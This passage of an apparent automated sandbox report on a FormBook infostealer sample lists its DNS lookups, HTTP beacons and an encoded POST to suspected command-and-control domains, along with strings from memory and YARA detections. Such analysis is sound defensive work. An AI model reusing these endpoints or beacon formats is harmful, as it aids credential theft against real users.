            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /c7rq/?mZytyNB=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+swaARuNAxDjOzMu+VfqP1kNqiiXC0Ug==&54D0m=gvohHHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.valerieomage.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /ktbm/?mZytyNB=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgXOWwK4/O35gX3K6ytzmMUh+twkmzSQ==&54D0m=gvohHHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kosherphonestore.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /kwl6/?54D0m=gvohHHH0&mZytyNB=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1EucVb48mJLaeeXAyU/wxkvnKBCdexA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.cwgehkk.storeConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /nml2/?mZytyNB=HPoEs5HSsEYYnAW6PVozIACR+89TlHzFxT1N2ofTBBi/nJmbqmnSjRqVxPoNn0pwlxgNo3SmadBTH7enssKr2X8+FKhtVfu//Txi/xQnlFJmGhF34A==&54D0m=gvohHHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mybodyradar.netConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /tb8p/?54D0m=gvohHHH0&mZytyNB=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiIsaScbSWFF5V9pamWb9U32+hQ7ii7xg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.lacemalt.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /xti2/?mZytyNB=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2pFGuXFTeP1snGKodOakbcCZ5ieg/dQ==&54D0m=gvohHHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.siteblogoficialon.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /7npk/?54D0m=gvohHHH0&mZytyNB=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MY4r+pCVils+sXQjgc19rp6lijR1H1Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mg55aa.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /i1fz/?mZytyNB=69+72+ftTFcgCPV1pfBGcRAhZJTRakO2Kh+ZkvubWnSJrIurKkpNo2aBygpvSICGeoPjDFn9pekXwSuquQeAgXbnoNXGqYnuCVvRNE6ZSnCvZlL6jw==&54D0m=gvohHHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.lavillitadepapa.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /gtrt/?54D0m=gvohHHH0&mZytyNB=CHU0G0yFQmM3m9FspjIn2OXZQ8PvFb3qq8K3IggeoLnhuD5d4WydmEsCdQRuIbszuu3RpEHjTi2Q+otudHtA+7uFI7xmMJNqmwR/uOZtT1hR+XqCuA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.csstoneoak.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficDNS traffic detected: DNS query: www.gospelstudygroup.org
            Source: global trafficDNS traffic detected: DNS query: www.valerieomage.com
            Source: global trafficDNS traffic detected: DNS query: www.instantmailer.cloud
            Source: global trafficDNS traffic detected: DNS query: www.kosherphonestore.com
            Source: global trafficDNS traffic detected: DNS query: www.cwgehkk.store
            Source: global trafficDNS traffic detected: DNS query: www.mybodyradar.net
            Source: global trafficDNS traffic detected: DNS query: www.lacemalt.top
            Source: global trafficDNS traffic detected: DNS query: www.siteblogoficialon.com
            Source: global trafficDNS traffic detected: DNS query: www.mcxright.com
            Source: global trafficDNS traffic detected: DNS query: www.amkmos.online
            Source: global trafficDNS traffic detected: DNS query: www.mg55aa.xyz
            Source: global trafficDNS traffic detected: DNS query: www.lavillitadepapa.com
            Source: global trafficDNS traffic detected: DNS query: www.csstoneoak.com
            Source: global trafficDNS traffic detected: DNS query: www.gzlhysuess.com
            Source: unknownHTTP traffic detected: POST /ktbm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.kosherphonestore.comOrigin: http://www.kosherphonestore.comReferer: http://www.kosherphonestore.com/ktbm/Content-Length: 196Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53Data Raw: 6d 5a 79 74 79 4e 42 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 4b 62 46 6b 42 69 59 64 75 50 6f 34 2f 56 7a 48 6b 75 55 69 70 77 63 53 37 4e 4c 77 70 55 6b 45 51 41 2f 52 34 4f 6d 31 58 44 61 33 43 33 73 7a 76 44 6b 76 6c 43 6f 78 62 33 64 6c 79 7a 77 32 6f 69 6d 4d 31 71 50 50 64 32 65 48 63 2f 4f 31 66 77 74 77 61 6d 2f 67 52 71 7a 52 56 48 31 34 6d 4f 56 4f 6c 68 46 45 49 52 47 68 65 68 77 6b 38 4c 6d 4f 76 7a 70 78 38 4f 52 5a 58 41 69 35 50 4d 77 45 52 30 49 63 68 6c 71 30 50 41 6f 4e 50 76 2b 4e 4a 31 52 54 5a 6b 55 35 50 41 6a 64 79 38 32 34 57 6f 47 33 62 45 57 44 73 35 56 Data Ascii: mZytyNB=QA6UYFT+ZhbfrKbFkBiYduPo4/VzHkuUipwcS7NLwpUkEQA/R4Om1XDa3C3szvDkvlCoxb3dlyzw2oimM1qPPd2eHc/O1fwtwam/gRqzRVH14mOVOlhFEIRGhehwk8LmOvzpx8ORZXAi5PMwER0Ichlq0PAoNPv+NJ1RTZkU5PAjdy824WoG3bEWDs5V
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Jul 2024 06:17:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Jul 2024 06:17:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Jul 2024 06:17:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Jul 2024 06:18:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: QYzBgoBGBcxProZWs.exe, 00000009.00000002.3793025669.0000000005756000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.csstoneoak.com
            Source: QYzBgoBGBcxProZWs.exe, 00000009.00000002.3793025669.0000000005756000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.csstoneoak.com/gtrt/
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Payment Form+Inquiry LIST.exeString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
            Source: Payment Form+Inquiry LIST.exeString found in binary or memory: https://aka.ms/nativeaot-c
            Source: Payment Form+Inquiry LIST.exeString found in binary or memory: https://aka.ms/nativeaot-compatibility
            Source: Payment Form+Inquiry LIST.exe, 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility8d8
            Source: Payment Form+Inquiry LIST.exeString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
            Source: Payment Form+Inquiry LIST.exeString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3785973000.0000000002AFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002AFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: findstr.exe, 00000007.00000003.1811093551.0000000007A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002AFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033V
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002AFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: findstr.exe, 00000007.00000002.3792132594.0000000003BF6000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000003846000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1922034773.000000002FC86000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://valerieomage.com/c7rq?mZytyNB=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: findstr.exe, 00000007.00000002.3794084439.0000000005FA0000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3792132594.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.000000000498C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.etmt194.com/s1/yurjyyya
            Source: findstr.exe, 00000007.00000002.3792132594.0000000003F1A000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000003B6A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.kosherphonestore.com/ktbm/?mZytyNB=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixt
            Source: QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.00000000047FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.lavillitadepapa.com/i1fz/?mZytyNB=69
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004562000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.00000000041B2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.siteblogoficialon.com/xti2/?mZytyNB=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 3.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
